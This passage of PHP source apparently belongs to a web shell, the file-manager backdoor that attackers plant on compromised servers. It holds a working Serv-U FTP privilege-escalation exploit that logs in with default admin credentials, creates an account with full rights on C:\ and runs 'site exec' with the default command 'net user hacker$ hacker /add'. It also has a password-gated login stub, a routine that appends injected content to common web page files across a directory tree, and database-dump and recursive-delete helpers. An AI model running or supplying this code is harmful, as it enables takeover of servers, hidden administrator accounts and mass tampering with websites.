                "-SessionTimeOut=-1\r\n". 
                "-Expire=0\r\n". 
                "-RatioUp=1\r\n". 
                "-RatioDown=1\r\n". 
                "-RatiosCredit=0\r\n". 
                "-QuotaCurrent=0\r\n". 
                "-QuotaMaximum=0\r\n". 
                "-Maintenance=None\r\n". 
                "-PasswordType=Regular\r\n". 
                "-Ratios=None\r\n". 
                " Access=".$part."\|RWAMELCDP\r\n"; 
        $deldomain="-DELETEDOMAIN\r\n". 
                     "-IP=0.0.0.0\r\n". 
                     " PortNo=21\r\n"; 
        $sock = fsockopen("127.0.0.1", $_POST["SUPort"], $errno, $errstr, 10); 
        $recvbuf = fgets($sock, 1024); 
        echo "<font color=red>Recv: $recvbuf</font><br>"; 
        $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; 
        fputs($sock, $sendbuf, strlen($sendbuf)); 
        echo "<font color=blue>Send: $sendbuf</font><br>"; 
        $recvbuf = fgets($sock, 1024); 
        echo "<font color=red>Recv: $recvbuf</font><br>"; 
        $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; 
        fputs($sock, $sendbuf, strlen($sendbuf)); 
        echo "<font color=blue>Send: $sendbuf</font><br>"; 
        $recvbuf = fgets($sock, 1024); 
        echo "<font color=red>Recv: $recvbuf</font><br>"; 
        $sendbuf = "SITE MAINTENANCE\r\n"; 
        fputs($sock, $sendbuf, strlen($sendbuf)); 
        echo "<font color=blue>Send: $sendbuf</font><br>"; 
        $recvbuf = fgets($sock, 1024); 
        echo "<font color=red>Recv: $recvbuf</font><br>"; 
        $sendbuf = $domain; 
        fputs($sock, $sendbuf, strlen($sendbuf)); 
        echo "<font color=blue>Send: $sendbuf</font><br>"; 
        $recvbuf = fgets($sock, 1024); 
        echo "<font color=red>Recv: $recvbuf</font><br>"; 
        $sendbuf = $adduser; 
        fputs($sock, $sendbuf, strlen($sendbuf)); 
        echo "<font color=blue>Send: $sendbuf</font><br>"; 
        $recvbuf = fgets($sock, 1024); 
        echo "<font color=red>Recv: $recvbuf</font><br>"; 
        echo "**********************************************************<br>"; 
        if($job!=="adduser"){// 
            echo "Starting Exploit ...<br>"; 
            echo "**********************************************************<br>"; 
            $exp = fsockopen("127.0.0.1", "21", $errno, $errstr, 10); 
            $recvbuf = fgets($exp, 1024); 
            echo "<font color=red>Recv: $recvbuf</font><br>"; 
            $sendbuf = "USER ".$user."\r\n"; 
            fputs($exp, $sendbuf, strlen($sendbuf)); 
            echo "<font color=blue>Send: $sendbuf</font><br>"; 
            $recvbuf = fgets($exp, 1024); 
            echo "<font color=red>Recv: $recvbuf</font><br>"; 
            $sendbuf = "PASS ".$password."\r\n"; 
            fputs($exp, $sendbuf, strlen($sendbuf)); 
            echo "<font color=blue>Send: $sendbuf</font><br>"; 
            $recvbuf = fgets($exp, 1024); 
            echo "<font color=red>Recv: $recvbuf</font><br>"; 
            $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; 
            fputs($exp, $sendbuf, strlen($sendbuf)); 
            echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["SUCommand"]."</font><br>"; 
            $recvbuf = fgets($exp, 1024); 
            echo "<font color=red>Recv: $recvbuf</font><br>"; 
            echo "**********************************************************<br>"; 
            echo "Starting Delete Domain ...<br>"; 
            echo "**********************************************************<br>"; 
            $sendbuf = $deldomain; 
            fputs($sock, $sendbuf, strlen($sendbuf)); 
            echo "<font color=blue>Send: $sendbuf</font><br>"; 
            $recvbuf = fgets($sock, 1024); 
            echo "<font color=red>Recv: $recvbuf</font><br>"; 
        }else{ 
            echo "All done ...<br>"; 
            echo "**********************************************************<br>"; 
        } 
        echo "</td></tr></table>"; 
        fclose($sock); 
        if($job!=="adduser") fclose($exp); 
    } 
    ?> 
<table width="760" border="0" cellpadding="3" cellspacing="1" 
    bgcolor="#ffffff"> 
    <tr class="firstalt"> 
        <td align="center">Serv-U  & </td> 
    </tr> 
    <form action="?action=SUExp" method="POST"> 
    <tr class="secondalt"> 
        <td align="center">LocalPort: <input name="SUPort" type="text" 
            class="INPUT" id="SUPort" value="43958" size="7"> LocalUser: <input 
            name="SUUser" type="text" class="INPUT" id="SUUser" 
            value="LocalAdministrator"> LocalPass: <input name="SUPass" 
            type="text" class="INPUT" id="SUPass" value="#l@$ak#.lk;0@P"> <br> 
            <?php 
            if($job!=="adduser"){ 
                ?> Command : <input name="SUCommand" type="text" class="INPUT" 
            id="SUCommand" value="net user hacker$ hacker /add" size="50"> &nbsp;<a 
            href="?action=SUExp&job=adduser">()</a> - <a href="#" 
            title="" 
            onClick="alert('hacker$hackerEXPhacker\n\nsite exec \n\n')">(?)</a> 
        <input name="user" type="hidden" value="hacker$"> <input 
            name="password" type="hidden" value="hacker"> <input name="part" 
            type="hidden" value="C:\"> <?} 
      else{ 
        ?> : <input name="user" type="text" class="INPUT" value="hacker$" 
            size="20"> : <input name="password" type="text" class="INPUT" 
            value="hacker" size="20"> : <input name="part" type="text" 
            class="INPUT" value="C:\" size="20"> <a href="?action=SUExp">(CMD)</a> 
        - <a href="#" title="" onClick="alert('')">(?)</a> <input 
            name="job" type="hidden" value="<?=$job?>"> <?php 
      } 
      ?></td> 
    </tr> 
    <tr class="secondalt"> 
        <td align="center"><input name="Submit" type="submit" class="input" 
            id="Submit" value=""> <input name="Submit" type="reset" 
            class="INPUT" value=""></td> 
    </tr> 
    </form> 
</table> 
      <?php 
} 
?> 
<hr width="775" noshade> 
<table width="775" border="0" cellpadding="0"> 
    <tr> 
        <td><FONT color=#ff3300>:</font></td> 
        <td align="right"><?php 
        debuginfo(); 
        ob_end_flush(); 
        ?></td> 
    </tr> 
</table> 
</center> 
</body> 
</html> 
<?php 
/** 
 * ====================================================== 
 *        
 * ====================================================== 
 */ 
        //  
function loginpage() { 
    global $hidden,$alexa; 
    if($hidden=="44997"){ 
//      echo <<<EOF 
?> 
<style type="text/css"> 
input { 
    font-family: "Verdana"; 
    font-size: "11px"; 
    BACKGROUND-COLOR: "#FFFFFF"; 
    height: "18px"; 
    border: "1px solid #666666"; 
} 
</style> 
<table width="416" border="0" align="center" cellpadding="0" 
    cellspacing="0"> 
    <form method="POST" action=""> 
    <tr> 
        <td height="75" align="center"><span 
            style="font-size: 11px; font-family: Verdana">: </span><input 
            name="adminpass" type="password" size="20"> <input type="hidden" 
            name="do" value="login"> <input type="submit" value=""></td> 
    </tr> 
    </form> 
<?php 
//EOF; 
    if($alexa!=="no"){ 
//      echo <<<EOF 
?> 
</table> 
<?php 
//EOF; 
        } 
    } 
 
exit; 
} 
//end loginpage() 
 
        //  
        function debuginfo() { 
            global $starttime; 
            $mtime = explode(' ', microtime()); 
            $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); 
            echo " $totaltime "; 
        } 
 
        //  
        function stripslashes_array(&$array) { 
            while(list($key,$var) = each($array)) { 
                if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) { 
                    if (is_string($var)) { 
                        $array[$key] = stripslashes($var); 
                    } 
                    if (is_array($var))  { 
                        $array[$key] = stripslashes_array($var); 
                    } 
                } 
            } 
            return $array; 
        } 
 
 
        //  
        function deltree($deldir) { 
            $mydir=@dir($deldir); 
            while($file=$mydir->read()) { 
                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { 
                    @chmod("$deldir/$file",0777); 
                    deltree("$deldir/$file"); 
                } 
                if (is_file("$deldir/$file")) { 
                    @chmod("$deldir/$file",0777); 
                    @unlink("$deldir/$file"); 
                } 
            } 
            $mydir->close(); 
            @chmod("$deldir",0777); 
            return (@rmdir($deldir)) ? 1 : 0; 
        } 
 
        //  
        function dir_writeable($dir) { 
            if (!is_dir($dir)) { 
                @mkdir($dir, 0777); 
            } 
            if(is_dir($dir)) { 
                if ($fp = @fopen("$dir/test.txt", 'w')) { 
                    @fclose($fp); 
                    @unlink("$dir/test.txt"); 
                    $writeable = 1; 
                } else { 
                    $writeable = 0; 
                } 
            } 
            return $writeable; 
        } 
 
        //  
        function getrowbg() { 
            global $bgcounter; 
            if ($bgcounter++%2==0) { 
                return "firstalt"; 
            } else { 
                return "secondalt"; 
            } 
        } 
 
        //  
        function getPath($mainpath, $relativepath) { 
            global $dir; 
            $mainpath_info           = explode('/', $mainpath); 
            $relativepath_info       = explode('/', $relativepath); 
            $relativepath_info_count = count($relativepath_info); 
            for ($i=0; $i<$relativepath_info_count; $i++) { 
                if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; 
                if ($relativepath_info[$i] == '..') { 
                    $mainpath_info_count = count($mainpath_info); 
                    unset($mainpath_info[$mainpath_info_count-1]); 
                    continue; 
                } 
                $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; 
            } //end for 
            return implode('/', $mainpath_info); 
        } 
        function dirtree($path,$mm) 
        { 
            $d =@dir("$path"); 
            while (false !== ($entry = $d->read())) { 
                if($entry == "." || $entry == "..") continue; 
                $file=$d->path."/" .$entry; 
                if(@is_dir($file)) 
                { 
                    dirtree($file,$mm); 
                } 
                else 
                { 
                    if(@ereg("default\.|index\.|admin\.|bbs\.|reg\.|help\.|upfile\.|upload\.|cart\.|class\.|login\.|diy\.|no\.|ok\.|del\.|sql\.|user\.|ubb\.|ftp\.|asp\.|top\.|new\.|open\.|name\.|email\.|img\.|images\.|web\.|blog\.|save\.|data\.|add\.|edit\.|main\.|form\.|game\.|about\.|manager\.|book\.|bt\.|mp3\.|vod\.|error\.|copy\.|move\.|down\.|system\.|logo\.|QQ\.|520\.|newup\.|myup\.|play\.|show\.|view\.|ip\.|err404\.|send\.|foot\.|char\.|info\.|list\.|shop\.|err\.|nc\.|ad\.|flash\.|text\.|admin_upfile\.|admin_upload\.|upfile_load\.|upfile_soft\.|upfile_photo\.|upfile_softpic\.|vip\.|505\.|tag\.|search\.|list\.|common\.|show\.|count\.|download\.|php\.",$file)) { 
                        $mm=stripcslashes( trim( $mm ) );// 
                        $handle = @fopen ("$file", "a"); 
                        @fwrite($handle, "$mm"); 
                        @fclose($handle); 
                        echo ":$file<br>"; 
                    } 
                } 
            } 
            $d->close(); 
        } 
        // PHP 
        function getphpcfg($varname) { 
            switch($result = get_cfg_var($varname)) { 
                case 0: 
                    return "No"; 
                    break; 
                case 1: 
                    return "Yes"; 
                    break; 
                default: 
                    return $result; 
                    break; 
            } 
        } 
 
        //  
        function getfun($funName) { 
            return (false !== function_exists($funName)) ? "Yes" : "No"; 
        } 
        /** 
         * 
         * ZIP 
         * @author Daniel Luo 
         */ 
        class zip 
        { 
 
            var $datasec, $ctrl_dir = array(); 
            var $eof_ctrl_dir = "PK\x05\x06\x00\x00\x00\x00"; 
            var $old_offset = 0; var $dirs = Array("."); 
            function Add($files,$compact) 
            { 
                if(!is_array($files[0])) $files=Array($files); 
 
                for($i=0;$files[$i];$i++){ 
                    $fn = $files[$i]; 
                    if(!in_Array(dirname($fn[0]),$this->dirs)) 
                    $this->add_Dir(dirname($fn[0])); 
                    if(basename($fn[0])) 
                    $ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); 
                } 
                return $ret; 
            } 
            function get_file() 
            { 
                $data = implode('', $this -> datasec); 
                $ctrldir = implode('', $this -> ctrl_dir); 
 
                return $data . $ctrldir . $this -> eof_ctrl_dir . 
                pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). 
                pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; 
            } 
            function ReadCentralDir($zip,$zip_name) 
            { 
                $size = filesize($zip_name); 
                if ($size < 277) $maximum_size = $size; 
                else $maximum_size=277; 
                @fseek($zip, $size-$maximum_size); 
                $pos = ftell($zip); $bytes = 0x00000000; 
                while ($pos < $size) 
                { 
                    $byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); 
                    if ($bytes == 0x504b0506){ $pos++; break; } $pos++; 
                } 
                $data=unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip,18)); 
                if ($data['comment_size'] != 0) 
                $centd['comment'] = fread($zip, $data['comment_size']); 
                else $centd['comment'] = ''; $centd['entries'] = $data['entries']; 
                $centd['disk_entries'] = $data['disk_entries']; 
                $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; 
                $centd['size'] = $data['size'];  $centd['disk'] = $data['disk']; 
                return $centd; 
            } 
            function ReadCentralFileHeaders($zip){ 
                $binary_data = fread($zip, 46); 
                $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); 
                if ($header['filename_len'] != 0) 
                $header['filename'] = fread($zip,$header['filename_len']); 
                else $header['filename'] = ''; 
                if ($header['extra_len'] != 0) 
                $header['extra'] = fread($zip, $header['extra_len']); 
                else $header['extra'] = ''; 
                if ($header['comment_len'] != 0) 
                $header['comment'] = fread($zip, $header['comment_len']); 
                else $header['comment'] = ''; 
                if ($header['mdate'] && $header['mtime']) 
                { 
                    $hour = ($header['mtime'] & 0xF800) >> 11; 
                    $minute = ($header['mtime'] & 0x07E0) >> 5; 
                    $seconde = ($header['mtime'] & 0x001F)*2; 
                    $year = (($header['mdate'] & 0xFE00) >> 9) + 1980; 
                    $month = ($header['mdate'] & 0x01E0) >> 5; 
                    $day = $header['mdate'] & 0x001F; 
                    $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
                } else { 
                    $header['mtime'] = time(); 
                } 
                $header['stored_filename'] = $header['filename']; 
                $header['status'] = 'ok'; 
                if (substr($header['filename'], -1) == '/') 
                $header['external'] = 0x41FF0010; 
                return $header; 
            } 
            function add_dir($name) 
            { 
                $name = str_replace("\\", "/", $name); 
                $fr = "PK\x03\x04
\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
                $fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
                $fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
                $this -> datasec[] = $fr; 
                $new_offset = strlen(implode("", $this->datasec)); 
                $cdrec = "PK\x01\x02\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
                $cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
                $cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
                $ext = "\xff\xff\xff\xff"; 
                $cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; 
                $this -> ctrl_dir[] = $cdrec; 
                $this -> old_offset = $new_offset; 
                $this -> dirs[] = $name; 
            } 
            function get_List($zip_name) 
            { 
                $zip = @fopen($zip_name, 'rb'); 
                if(!$zip) return(0); 
                $centd = $this->ReadCentralDir($zip,$zip_name); 
                @rewind($zip); 
                @fseek($zip, $centd['offset']); 
                for ($i=0; $i<$centd['entries']; $i++) 
                { 
                    $header = $this->ReadCentralFileHeaders($zip); 
                    $header['index'] = $i;$info['filename'] = $header['filename']; 
                    $info['stored_filename'] = $header['stored_filename']; 
                    $info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; 
                    $info['crc'] = strtoupper(dechex( $header['crc'] )); 
                    $info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; 
                    $info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; 
                    $info['index'] = $header['index'];$info['status'] = $header['status']; 
                    $ret[]=$info; unset($header); 
                } 
                return $ret; 
            } 
            function add_File($data, $name, $compact = 1) 
            { 
                $name     = str_replace('\\', '/', $name); 
                $dtime    = dechex($this->DosTime()); 
                $hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] 
                . '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; 
                eval('$hexdtime = "' . $hexdtime . '";'); 
                if($compact) 
                $fr = "PK\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; 
                else $fr = "PK\x03\x04
\x00\x00\x00\x00\x00".$hexdtime; 
                $unc_len = strlen($data); $crc = crc32($data); 
                if($compact){ 
                    $zdata = gzcompress($data); $c_len = strlen($zdata); 
                    $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 
                }else{ 
                    $zdata = $data; 
                } 
                $c_len=strlen($zdata); 
                $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
                $fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; 
                $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
                $this -> datasec[] = $fr; 
                $new_offset        = strlen(implode('', $this->datasec)); 
                if($compact) 
                $cdrec = "PK\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; 
                else $cdrec = "PK\x01\x02\x14\x00
\x00\x00\x00\x00\x00"; 
                $cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
                $cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); 
                $cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); 
                $cdrec .= pack('V', $this -> old_offset ); 
                $this -> old_offset = $new_offset; 
                $cdrec .= $name; 
                $this -> ctrl_dir[] = $cdrec; 
                return true; 
            } 
 
            function DosTime() { 
                $timearray = getdate(); 
                if ($timearray['year'] < 1980) { 
                    $timearray['year'] = 1980; $timearray['mon'] = 1; 
                    $timearray['mday'] = 1; $timearray['hours'] = 0; 
                    $timearray['minutes'] = 0; $timearray['seconds'] = 0; 
                } 
                return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) |     ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | 
                ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); 
            } 
            function Extract ( $zn, $to, $index = Array(-1) ) 
            { 
                $ok = 0; $zip = @fopen($zn,'rb'); 
                if(!$zip) return(-1); 
                $cdir = $this->ReadCentralDir($zip,$zn); 
                $pos_entry = $cdir['offset']; 
 
                if(!is_array($index)){ $index = array($index);  } 
                for($i=0; $index[$i];$i++){ 
                    if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) 
                    return(-1); 
                } 
 
                for ($i=0; $i<$cdir['entries']; $i++) 
                { 
                    @fseek($zip, $pos_entry); 
                    $header = $this->ReadCentralFileHeaders($zip); 
                    $header['index'] = $i; $pos_entry = ftell($zip); 
                    @rewind($zip); fseek($zip, $header['offset']); 
                    if(in_array("-1",$index)||in_array($i,$index)) 
                    $stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); 
 
                } 
                fclose($zip); 
                return $stat; 
            } 
            function ExtractFile($header,$to,$zip) 
            { 
                $header = $this->readfileheader($zip); 
 
                if(substr($to,-1)!="/") $to.="/"; 
                if(!@is_dir($to)) @mkdir($to,0777); 
 
                $pth = explode("/",dirname($header['filename'])); 
                for($i=0;isset($pth[$i]);$i++){ 
                    if(!$pth[$i]) continue;$pthss.=$pth[$i]."/"; 
                    if(!is_dir($to.$pthss)) @mkdir($to.$pthss,0777); 
                } 
                if (!($header['external']==0x41FF0010)&&!($header['external']==16)) 
                { 
                    if ($header['compression']==0) 
                    { 
                        $fp = @fopen($to.$header['filename'], 'wb'); 
                        if(!$fp) return(-1); 
                        $size = $header['compressed_size']; 
 
                        while ($size != 0) 
                        { 
                            $read_size = ($size < 2048 ? $size : 2048); 
                            $buffer = fread($zip, $read_size); 
                            $binary_data = pack('a'.$read_size, $buffer); 
                            @fwrite($fp, $binary_data, $read_size); 
                            $size -= $read_size; 
                        } 
                        fclose($fp); 
                        touch($to.$header['filename'], $header['mtime']); 
 
                    }else{ 
                        $fp = @fopen($to.$header['filename'].'.gz','wb'); 
                        if(!$fp) return(-1); 
                        $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), 
                        Chr(0x00), time(), Chr(0x00), Chr(3)); 
 
                        fwrite($fp, $binary_data, 10); 
                        $size = $header['compressed_size']; 
 
                        while ($size != 0) 
                        { 
                            $read_size = ($size < 1024 ? $size : 1024); 
                            $buffer = fread($zip, $read_size); 
                            $binary_data = pack('a'.$read_size, $buffer); 
                            @fwrite($fp, $binary_data, $read_size); 
                            $size -= $read_size; 
                        } 
 
                        $binary_data = pack('VV', $header['crc'], $header['size']); 
                        fwrite($fp, $binary_data,8); fclose($fp); 
 
                        $gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); 
                        if(!$gzp) return(-2); 
                        $fp = @fopen($to.$header['filename'],'wb'); 
                        if(!$fp) return(-1); 
                        $size = $header['size']; 
 
                        while ($size != 0) 
                        { 
                            $read_size = ($size < 2048 ? $size : 2048); 
                            $buffer = gzread($gzp, $read_size); 
                            $binary_data = pack('a'.$read_size, $buffer); 
                            @fwrite($fp, $binary_data, $read_size); 
                            $size -= $read_size; 
                        } 
                        fclose($fp); gzclose($gzp); 
 
                        touch($to.$header['filename'], $header['mtime']); 
                        @unlink($to.$header['filename'].'.gz'); 
 
                    }} 
                    return true; 
            } 
            function ReadFileHeader($zip) 
            { 
                $binary_data = fread($zip, 30); 
                $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); 
 
                $header['filename'] = fread($zip, $data['filename_len']); 
                if ($data['extra_len'] != 0) { 
                    $header['extra'] = fread($zip, $data['extra_len']); 
                } else { $header['extra'] = ''; } 
 
                $header['compression'] = $data['compression'];$header['size'] = $data['size']; 
                $header['compressed_size'] = $data['compressed_size']; 
                $header['crc'] = $data['crc']; $header['flag'] = $data['flag']; 
                $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; 
 
                if ($header['mdate'] && $header['mtime']){ 
                    $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; 
                    $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; 
                    $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; 
                    $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
                }else{$header['mtime'] = time();} 
 
                $header['stored_filename'] = $header['filename']; 
                $header['status'] = "ok"; 
                return $header; 
            } 
        } 
 
        function addziparray($dir2) //ZIP 
        { 
            global $dir,$zipfilearray; 
            @$dirs=opendir($dir."/".$dir2); 
            while (@$file=readdir($dirs)) { 
                if(!is_dir("$dir/$dir2/$file")) { 
                    $zipfilearray[]="$dir2/$file"; 
                } 
                elseif($file!="."&&$file!="..") { 
                    addziparray("$dir2/$file"); 
                } 
            } 
            @closedir($dirs); 
        } 
        function hlinK($str=""){ 
            $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); 
            $ret=$_SERVER['PHP_SELF']."?"; 
            $new=explode("&",$str); 
            foreach ($_GET as $key => $v){ 
                $add=1; 
                foreach($new as $m){ 
                    $el = explode("=", $m); 
                    if ($el[0]==$key)$add=0; 
                } 
                if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&"; 
            } 
            $ret.=$str; 
            return $ret; 
        } 
 
        /** 
         *   
         */ 
        function sqldumptable($table, $fp=0) { 
            $tabledump = "DROP TABLE IF EXISTS $table;\n"; 
            $tabledump .= "CREATE TABLE $table (\n"; 
 
            $firstfield=1; 
 
            $fields = mysql_query("SHOW FIELDS FROM $table"); 
            while ($field = mysql_fetch_array($fields)) { 
                if (!$firstfield) { 
                    $tabledump .= ",\n"; 
                } else { 
                    $firstfield=0; 
                } 
                $tabledump .= "   $field[Field] $field[Type]"; 
                if (!empty($field["Default"])) { 
                    $tabledump .= " DEFAULT '$field[Default]'"; 
                } 
                if ($field['Null'] != "YES") { 
                    $tabledump .= " NOT NULL"; 
                } 
                if ($field['Extra'] != "") { 
                    $tabledump .= " $field[Extra]"; 
                } 
            } 
            mysql_free_result($fields); 
 
            $keys = mysql_query("SHOW KEYS FROM $table"); 
            while ($key = mysql_fetch_array($keys)) { 
                $kname=$key['Key_name']; 
                if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { 
                    $kname="UNIQUE|$kname"; 
                } 
                if(!is_array($index[$kname])) { 
                    $index[$kname] = array(); 
                } 
                $index[$kname][] = $key['Column_name']; 
            } 
            mysql_free_result($keys); 
 
            while(list($kname, $columns) = @each($index)) { 
                $tabledump .= ",\n"; 
                $colnames=implode($columns,","); 
 
                if ($kname == "PRIMARY") { 
                    $tabledump .= "   PRIMARY KEY ($colnames)"; 
                } else { 
                    if (substr($kname,0,6) == "UNIQUE") { 
                        $kname=substr($kname,7); 
                    } 
                    $tabledump .= "   KEY $kname ($colnames)"; 
                } 
            } 
 
            $tabledump .= "\n);\n\n"; 
            if ($fp) { 
                fwrite($fp,$tabledump); 
            } else { 
                echo $tabledump; 
            } 
 
            $rows = mysql_query("SELECT * FROM $table"); 
            $numfields = mysql_num_fields($rows); 
            while ($row = mysql_fetch_array($rows)) { 
                $tabledump = "INSERT INTO $table VALUES("; 
 
                $fieldcounter=-1; 
                $firstfield=1; 
                while (++$fieldcounter<$numfields) { 
                    if (!$firstfield) { 
                        $tabledump.=", "; 
                    } else { 
                        $firstfield=0; 
                    } 
 
                    if (!isset($row[$fieldcounter])) { 
                        $tabledump .= "NULL"; 
                    } else { 
                        $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; 
                    } 
                } 
 
                $tabledump .= ");\n"; 
 
                if ($fp) { 
                    fwrite($fp,$tabledump); 
                } else { 
                    echo $tabledump; 
                } 
            } 
            mysql_free_result($rows); 
        } 
 
        class FORMS { 
            function tableheader() { 
                echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n"; 
            } 
 
            function headerform($arg=array()) { 
                global $dir; 
                if ($arg[enctype]){ 
                    $enctype="enctype=\"$arg[enctype]\""; 
                } else { 
                    $enctype=""; 
                } 
                if (!isset($arg[method])) { 
                    $arg[method] = "POST"; 
                } 
                if (!isset($arg[action])) { 
                    $arg[action] = ''; 
                } 
                echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n"; 
                echo "  <tr>\n"; 
                echo "    <td>".$arg[content]."</td>\n"; 
                echo "  </tr>\n"; 
                echo "  </form>\n"; 
            } 
 
            function tdheader($title) { 
                global $dir; 
                echo "  <tr class=\"firstalt\">\n"; 
                echo "  <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\"></a>]</b></td>\n"; 
                echo "  </tr>\n"; 
            } 
 
            function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { 
                if ($bgcolor=='2') { 
                    $css="secondalt"; 
                } elseif ($bgcolor=='1') { 
                    $css="firstalt"; 
                } else { 
                    $css=$bgcolor; 
                } 
                $height = empty($height) ? "" : " height=".$height; 
                $colspan = empty($colspan) ? "" : " colspan=".$colspan; 
                echo "  <tr class=\"".$css."\">\n"; 
                echo "  <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n"; 
                echo "  </tr>\n"; 
            } 
 
            function tablefooter() { 
                echo "</table>\n"; 
            } 
 
            function formheader($action='',$title,$target='') { 
                global $dir; 
                $target = empty($target) ? "" : " target=\"".$target."\""; 
                echo " <form action=\"$action\" method=\"POST\"".$target.">\n"; 
                echo "  <tr class=\"firstalt\">\n"; 
                echo "  <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\"></a>]</b></td>\n"; 
                echo "  </tr>\n"; 
            } 
 
            function makehidden($name,$value=''){ 
                echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n"; 
            } 
 
            function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){ 
                $css = ($css == 'input') ? " class=\"input\"" : ""; 
                $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n"; 
                return $input; 
            } 
 
            function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){ 
                $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n"; 
                return $textarea; 
            } 
 
            function formfooter($over='',$height=''){ 
                $height = empty($height) ? "" : " height=\"".$height."\""; 
                echo "  <tr class=\"secondalt\">\n"; 
                echo "  <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"\"></td>\n"; 
                echo "  </tr>\n"; 
                echo " </form>\n"; 
                echo $end = empty($over) ? "" : "</table>\n"; 
            } 
            /** 
             * 
             *  
             * @param unknown_type $arg 
             */ 
            function makeselect($arg = array()){ 
                if ($arg[multiple]==1) { 
                    $multiple = " multiple"; 
                    if ($arg[size]>0) { 
                        $size = "size=$arg[size]"; 
                    } 
                } 
                if ($arg[css]==0) { 
                    $css = "class=\"input\""; 
                } 
                $select = "<select $css name=\"$arg[name]\"$multiple $size>\n"; 
                if (is_array($arg[option])) { 
                    foreach ($arg[option] AS $key=>$value) { 
                        if (!is_array($arg[selected])) { 
                            if ($arg[selected]==$key) { 
                                $select .= "<option value=\"$key\" selected>$value</option>\n"; 
                            } else { 
                                $select .= "<option value=\"$key\">$value</option>\n"; 
                            } 
 
                        } elseif (is_array($arg[selected])) { 
                            if ($arg[selected][$key]==1) { 
                                $select .= "<option value=\"$key\" selected>$value</option>\n"; 
                            } else { 
                                $select .= "<option value=\"$key\">$value</option>\n"; 
                            } 
                        } 
                    } 
                } 
                $select .= "</select>\n"; 
                return $select; 
            } 
        } 
        /** 
         * 
         *  
         * @param unknown_type $path 
         */ 
        function find($path) 
        { 
            global $oldkey,$type,$type2,$endline,$beline; 
            if(is_dir("$path")){ 
                $tempdir=opendir("$path"); 
